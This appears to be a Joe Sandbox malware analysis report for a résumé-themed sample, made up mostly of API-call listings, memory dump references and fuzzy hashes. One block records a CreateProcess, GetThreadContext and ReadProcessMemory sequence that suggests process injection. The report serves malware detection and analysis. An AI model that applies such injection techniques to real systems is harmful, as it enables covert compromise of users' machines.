                                                                                        • __NMSG_WRITE.LIBCMT ref: 003A397A
                                                                                          • Part of subcall function 003A821F: GetModuleFileNameW.KERNEL32(00000000,00440312,00000104,00000000,00000001,00000000), ref: 003A82B1
                                                                                          • Part of subcall function 003A821F: ___crtMessageBoxW.LIBCMT ref: 003A835F
                                                                                          • Part of subcall function 003A1145: ___crtCorExitProcess.LIBCMT ref: 003A114B
                                                                                          • Part of subcall function 003A1145: ExitProcess.KERNEL32 ref: 003A1154
                                                                                          • Part of subcall function 003A7C0E: __getptd_noexit.LIBCMT ref: 003A7C0E
                                                                                        • RtlAllocateHeap.NTDLL(01840000,00000000,00000001,00000001,00000000,?,?,0039F507,?,0000000E), ref: 003A399F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                        • String ID:
                                                                                        • API String ID: 1372826849-0
                                                                                        • Opcode ID: 072548f369928e24dd7163be079cb01646c690546b60a362ac8685fd2df1462f
                                                                                        • Instruction ID: b283f1d5adfe0c77b43621233a92e5f080f59fb1b017c71ece280f6ade704f8f
                                                                                        • Opcode Fuzzy Hash: 072548f369928e24dd7163be079cb01646c690546b60a362ac8685fd2df1462f
                                                                                        • Instruction Fuzzy Hash: 0B0192752453019AE6233B69EC46B6B3358DB83760F22012DF5059F192DFB49D0086A4
                                                                                        APIs
                                                                                        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,003CC385,?,?,?,?,?,00000004), ref: 003CC6F2
                                                                                        • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,003CC385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 003CC708
                                                                                        • CloseHandle.KERNEL32(00000000,?,003CC385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 003CC70F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$CloseCreateHandleTime
                                                                                        • String ID:
                                                                                        • API String ID: 3397143404-0
                                                                                        • Opcode ID: acdbf14e48b1db293d26496bb566d837d4ec51a44c21a52d38ea2f168f98f82e
                                                                                        • Instruction ID: e4910be001e073cde10b6b13bda416c28936280f65c2b0bb96618a75a36a247d
                                                                                        • Opcode Fuzzy Hash: acdbf14e48b1db293d26496bb566d837d4ec51a44c21a52d38ea2f168f98f82e
                                                                                        • Instruction Fuzzy Hash: 92E08632540214BBD7211B94AC09FCA7F18EB05760F104220FB14790E09BB22915879C
                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 003CBB72
                                                                                          • Part of subcall function 003A1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,003A7A85), ref: 003A1CB1
                                                                                          • Part of subcall function 003A1C9D: GetLastError.KERNEL32(00000000,?,003A7A85), ref: 003A1CC3
                                                                                        • _free.LIBCMT ref: 003CBB83
                                                                                        • _free.LIBCMT ref: 003CBB95
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 776569668-0
                                                                                        • Opcode ID: 8d6c99314b0704041c66cbc9d98ad607d1a0ae96d99a55b8255782f8bd4ba31d
                                                                                        • Instruction ID: 63423ecacd36b18a51b50a0d06bc001311d0c28baa13d4dcd0a60edbe12eb309
                                                                                        • Opcode Fuzzy Hash: 8d6c99314b0704041c66cbc9d98ad607d1a0ae96d99a55b8255782f8bd4ba31d
                                                                                        • Instruction Fuzzy Hash: 14E05BA174174147DA3565796E45FB357DC8F05371F15081DB459FB146CF24FC4086B4
                                                                                        APIs
                                                                                          • Part of subcall function 003822A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,003824F1), ref: 00382303
                                                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 003825A1
                                                                                        • CoInitialize.OLE32(00000000), ref: 00382618
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 003F503A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3815369404-0
                                                                                        • Opcode ID: 6f5d51bf856ceee99ca95f19dfdcc50e64aafd87fd551a3da9ae63deb6b6c710
                                                                                        • Instruction ID: f4d9bd61b52f51aa27645ac7e42dbd2dfc685e47b10e2ea23fe6e69d72c7ac2a
                                                                                        • Opcode Fuzzy Hash: 6f5d51bf856ceee99ca95f19dfdcc50e64aafd87fd551a3da9ae63deb6b6c710
                                                                                        • Instruction Fuzzy Hash: 9B71B1BC9413818BD305EF6AE991495BBA4FB5A34478082BED51AEB3B1DBB444C4CF1C
                                                                                        APIs
                                                                                        • _strcat.LIBCMT ref: 003E08FD
                                                                                          • Part of subcall function 0038936C: __swprintf.LIBCMT ref: 003893AB
                                                                                          • Part of subcall function 0038936C: __itow.LIBCMT ref: 003893DF
                                                                                        • _wcscpy.LIBCMT ref: 003E098C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: __itow__swprintf_strcat_wcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 1012013722-0
                                                                                        • Opcode ID: 6a537543dd6432baf6ee89429d8576bd782869a752dc062da92902d268265b6e
                                                                                        • Instruction ID: 162e520a610743f711b8262970c90c1bde62d89c11e383b4b7ee04827df55f4a
                                                                                        • Opcode Fuzzy Hash: 6a537543dd6432baf6ee89429d8576bd782869a752dc062da92902d268265b6e
                                                                                        • Instruction Fuzzy Hash: 04914A34A00614DFCB1AEF29C49196DB7E5FF49310B5585AAE85ACF3A2DB70ED41CB80
                                                                                        APIs
                                                                                        • IsThemeActive.UXTHEME ref: 00383A73
                                                                                          • Part of subcall function 003A1405: __lock.LIBCMT ref: 003A140B
                                                                                          • Part of subcall function 00383ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00383AF3
                                                                                          • Part of subcall function 00383ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00383B08
                                                                                          • Part of subcall function 00383D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00383AA3,?), ref: 00383D45
                                                                                          • Part of subcall function 00383D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00383AA3,?), ref: 00383D57
                                                                                          • Part of subcall function 00383D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00441148,00441130,?,?,?,?,00383AA3,?), ref: 00383DC8
                                                                                          • Part of subcall function 00383D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00383AA3,?), ref: 00383E48
                                                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00383AB3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                                        • String ID:
                                                                                        • API String ID: 924797094-0
                                                                                        • Opcode ID: b4db812d0f91ea9a1b73d973cbec3ed579159950328a68bdbb4b31d41cc7ac09
                                                                                        • Instruction ID: 134b7c6789eea2eedb1110d717816a7cd6e7ad6835d427220fdc7accdf360575
                                                                                        • Opcode Fuzzy Hash: b4db812d0f91ea9a1b73d973cbec3ed579159950328a68bdbb4b31d41cc7ac09
                                                                                        • Instruction Fuzzy Hash: D3119D759043419BC701EF69E94591AFBE8EF95710F00892EF5848B2B1DB709584CF96
                                                                                        APIs
                                                                                        • ___lock_fhandle.LIBCMT ref: 003AEA29
                                                                                        • __close_nolock.LIBCMT ref: 003AEA42
                                                                                          • Part of subcall function 003A7BDA: __getptd_noexit.LIBCMT ref: 003A7BDA
                                                                                          • Part of subcall function 003A7C0E: __getptd_noexit.LIBCMT ref: 003A7C0E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                        • String ID:
                                                                                        • API String ID: 1046115767-0
                                                                                        • Opcode ID: b3884352e05f3a0666ceb4cde80fcfa30bfc2e879bb607b2bc640c89380d7bf9
                                                                                        • Instruction ID: 5f116db3721991cd580bd147a790627338fd8534a21f157a09dda46c3fa00251
                                                                                        • Opcode Fuzzy Hash: b3884352e05f3a0666ceb4cde80fcfa30bfc2e879bb607b2bc640c89380d7bf9
                                                                                        • Instruction Fuzzy Hash: D21161B3909A109AD713BF68D9827597A61EF83331F2A4350E4345F1E3CBB88D4197A5
                                                                                        APIs
                                                                                          • Part of subcall function 003A395C: __FF_MSGBANNER.LIBCMT ref: 003A3973
                                                                                          • Part of subcall function 003A395C: __NMSG_WRITE.LIBCMT ref: 003A397A
                                                                                          • Part of subcall function 003A395C: RtlAllocateHeap.NTDLL(01840000,00000000,00000001,00000001,00000000,?,?,0039F507,?,0000000E), ref: 003A399F
                                                                                        • std::exception::exception.LIBCMT ref: 0039F51E
                                                                                        • __CxxThrowException@8.LIBCMT ref: 0039F533
                                                                                          • Part of subcall function 003A6805: RaiseException.KERNEL32(?,?,0000000E,00436A30,?,?,?,0039F538,0000000E,00436A30,?,00000001), ref: 003A6856
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                        • String ID:
                                                                                        • API String ID: 3902256705-0
                                                                                        • Opcode ID: fbc86824edc6a01c60a02912c5bb3bf761430232f95cde5697d95f38c89dd676
                                                                                        • Instruction ID: 88abe1667c6cc2128043e40d2ec4a918f8fe8c3dc68083ca50db6a3ff3db6c7a
                                                                                        • Opcode Fuzzy Hash: fbc86824edc6a01c60a02912c5bb3bf761430232f95cde5697d95f38c89dd676
                                                                                        • Instruction Fuzzy Hash: AEF0283150020E6BCB02BF9CDC029EE77ACDF02314F658036F908E6081CBB4D64487A9
                                                                                        APIs
                                                                                          • Part of subcall function 003A7C0E: __getptd_noexit.LIBCMT ref: 003A7C0E
                                                                                        • __lock_file.LIBCMT ref: 003A3629
                                                                                          • Part of subcall function 003A4E1C: __lock.LIBCMT ref: 003A4E3F
                                                                                        • __fclose_nolock.LIBCMT ref: 003A3634
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                        • String ID:
                                                                                        • API String ID: 2800547568-0
                                                                                        • Opcode ID: 12ba72b3f8cd1919c27ab9bf6e47ee60669be598c1cb3a6b848a48c004e4997a
                                                                                        • Instruction ID: 4d7941248922398a8050b0dbea73d66350f6f3184ecd2bc866ce2412225044c4
                                                                                        • Opcode Fuzzy Hash: 12ba72b3f8cd1919c27ab9bf6e47ee60669be598c1cb3a6b848a48c004e4997a
                                                                                        • Instruction Fuzzy Hash: F8F0B471901604AAD713BF69884776EBAA0EF53330F2A8109F460AF2E1CB7C8A419F55
                                                                                        APIs
                                                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 019FBA53
                                                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 019FBAE9
                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 019FBB0B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1707401369.00000000019F9000.00000040.00000020.00020000.00000000.sdmp, Offset: 019F9000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_19f9000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                        • String ID:
                                                                                        • API String ID: 2438371351-0
                                                                                        • Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                                        • Instruction ID: a4b01ddb63f4eb949e3f28c6644799fc7f2b8aa9e100986c2bcce09769ed88c0
                                                                                        • Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                                        • Instruction Fuzzy Hash: 8212DD24E24658C6EB24DF64D8507DEB272EF68301F1090ED910DEB7A4E77A4F81CB5A
                                                                                        APIs
                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0038E959
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePeek
                                                                                        • String ID:
                                                                                        • API String ID: 2222842502-0
                                                                                        • Opcode ID: 7ab26611c2cd2f02a8568bcb3634c1f3f3c32764b4f09c40a6b56e9719d8df57
                                                                                        • Instruction ID: 4956f86d955aaf85aa9fed7016f3736b5100960fe9f17a4cebee13f6ef410d90
                                                                                        • Opcode Fuzzy Hash: 7ab26611c2cd2f02a8568bcb3634c1f3f3c32764b4f09c40a6b56e9719d8df57
                                                                                        • Instruction Fuzzy Hash: 8681D8709087849FEF27DF24C4447697BD0AB52304F0A49BEEE898B262D775D889CB52
                                                                                        APIs
                                                                                        • __flush.LIBCMT ref: 003A2A0B
                                                                                          • Part of subcall function 003A7C0E: __getptd_noexit.LIBCMT ref: 003A7C0E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: __flush__getptd_noexit
                                                                                        • String ID:
                                                                                        • API String ID: 4101623367-0
                                                                                        • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                                        • Instruction ID: 09cb368ff4ed72ca149ad15614b806921a293866bf282408fdb789f81768ee66
                                                                                        • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                                        • Instruction Fuzzy Hash: 77419031700706AFDF2A8FADC8819AF7BA6EF46760F25852DE855CB240EB70DD518B40
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ProtectVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 544645111-0
                                                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                        • Instruction ID: 7b640dd270a1f4985382beb5a0ef842ab5751bdc12af5c7b236e8f023f0c08eb
                                                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                        • Instruction Fuzzy Hash: 6A31F470A00105DFDB1ADF58C490A69FBB6FF49340B6586A5E40ACB766DB31EDC1CB80
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free
                                                                                        • String ID:
                                                                                        • API String ID: 269201875-0
                                                                                        • Opcode ID: df86d46202b3770112d9e09043a190d2575b9a687f3fa848423890af914dba62
                                                                                        • Instruction ID: 9a21ec7600b11b036e881e1c8b5bcb00ca9e23086294dc1fc07f7a31a5ee097d
                                                                                        • Opcode Fuzzy Hash: df86d46202b3770112d9e09043a190d2575b9a687f3fa848423890af914dba62
                                                                                        • Instruction Fuzzy Hash: E031B075104A68DFCF06AF41D08066E7BB4FF49320F10854AEA955F3D6D7B0A985CF91
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClearVariant
                                                                                        • String ID:
                                                                                        • API String ID: 1473721057-0
                                                                                        • Opcode ID: 1e91e9ad1508ec48cdd1a0adb6760d7913627e3af07783cb4202ffae40c5c345
                                                                                        • Instruction ID: 1dab5b08c12c021d9446c321f422744ee6ad91ba9e32a21e5d768130f4c3c2b4
                                                                                        • Opcode Fuzzy Hash: 1e91e9ad1508ec48cdd1a0adb6760d7913627e3af07783cb4202ffae40c5c345
                                                                                        • Instruction Fuzzy Hash: E7415E705046518FDB26DF14C484B2ABBE0BF45308F1A89ACE99A5B362C372FC85CF52
                                                                                        APIs
                                                                                          • Part of subcall function 00384214: FreeLibrary.KERNEL32(00000000,?), ref: 00384247
                                                                                        • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,003839FE,?,00000001), ref: 003841DB
                                                                                          • Part of subcall function 00384291: FreeLibrary.KERNEL32(00000000), ref: 003842C4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$Free$Load
                                                                                        • String ID:
                                                                                        • API String ID: 2391024519-0
                                                                                        • Opcode ID: eb7e7ffa584952de72c9f517cb7e7df5ec77e62ebc9e93bd24f96985ea8531ba
                                                                                        • Instruction ID: f3dc72d0b0527fc44f1e9021cfa0e6d86dbd5dc2bcbc751f82f44a123d4cb684
                                                                                        • Opcode Fuzzy Hash: eb7e7ffa584952de72c9f517cb7e7df5ec77e62ebc9e93bd24f96985ea8531ba
                                                                                        • Instruction Fuzzy Hash: D911A331604307ABDB12FB74DD06FAE77A99F40700F10886DF596AE5C1EB74DA049B60
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
